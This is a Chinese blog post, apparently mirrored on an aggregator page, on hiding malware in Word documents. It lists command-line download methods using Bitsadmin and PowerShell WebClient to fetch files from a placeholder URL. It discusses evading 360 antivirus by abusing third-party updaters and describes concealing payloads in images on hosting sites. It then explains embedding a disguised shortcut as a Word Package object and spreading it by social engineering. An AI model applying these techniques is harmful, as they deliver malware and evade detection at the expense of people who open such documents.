zoukankan      html  css  js  c++  java
  • Word 通过添加Package 实现word藏毒

    这个思路要结合近期在一些安全网站上公布的姿势来实现,先科普几个地方。

    (1)通过cmd本身就可以直接下载:

    Bitsadmin /transfer AA /download /priority normal "http://..." "..."

    其实讲道理也可以直接调用Bitsadmin.exe cmd没关系。问题是刚刚我测试一发,返现woc 360竟然报毒了?


    然后我换了个姿势,直接cmd启动powershell下载:

    cmd.exe /c powershell.exe $client = new-object System.Net.WebClient $client.DownloadFile('#1', '#2')

     

    单独直接快捷方式调用powershell下载:


    OK这三种方式都不行,看样360已经对这方面做出了处理,我们只能另找其他的方法。刚刚倒腾了好久,找到了解决方案了,可以直接利用第三方软件,比如本机上装了AAA产品,分析发的升级请求调用格式(这个地方有的保护了,有的没保护),然后直接调用他就没事了,不过这个地方就自然引入了一个局限性了呗。但好消息是很多的产品都存在这种漏洞,so...OK就说这么多,我可不想整理个笔记就惹来不好的事

    (2)ok第一个姿势就算普及玩了,虽然是瞬间打脸。第二个是近期又有网站曝光了那个图片藏毒的思路,其实这个思路比较老了,但是目前来说找到这么一个网站还是很容易的,前提是了解一下基本图片文件的格式,然后在不破坏原有格式的前提下混淆东西进去,然后上传到相关网站上。但问题是因为某些限制(像是今天说的这个姿势),我们只能去找可以转存exe文件的那种,或者是dll文件的那种,但是好消息是很容易找到,具体是哪个我不透漏可以自己去找。So文件下载和文件存储问题都搞定了。

    (3)然后就是word添加package对象实现类似宏病毒的插入,当然不直接插入一个exe,这次是插入一个快捷方式,创建一个兼容上面1,2的快捷方式。我随便写一个测试的吧,就加入直接调用本地计算器(这个地方扩展很大,可以直接调用本地cmd,powershell,以及已经安装的其他程序,仅仅通过简单的字符串)。


    然后添加到word里面的对象->package


    之后在简单改下图标啥的,掩护一下。

     

    4)第四部分,也是最最重要的一个部分,就是通过什么手段去传播,这个地方就考验大家 社会工程学 的能力了,我垃圾,不在这里装逼。哈哈。OK就是这样,把这些东西简单穿一下线,这几个地方是前几天逛一些安全新闻网站看到的。随便总结下。没啥难点。

  • 相关阅读:
    [LuoguP1445][LOJ#10202]樱花
    [APIO/CTSC2007]动物园
    [LOJ#10157]皇宫看守
    python3安装crypto出错,及解决方法
    Qt之QuaZip编译-使用教程
    CentOS-NAT模式下(DHCP)联网
    CentOS桌面环境中网卡启动失败
    Linux基础--基础命令
    Linux基础 --1
    python面试题----4
  • 原文地址:https://www.cnblogs.com/csnd/p/12062079.html
Copyright © 2011-2022 走看看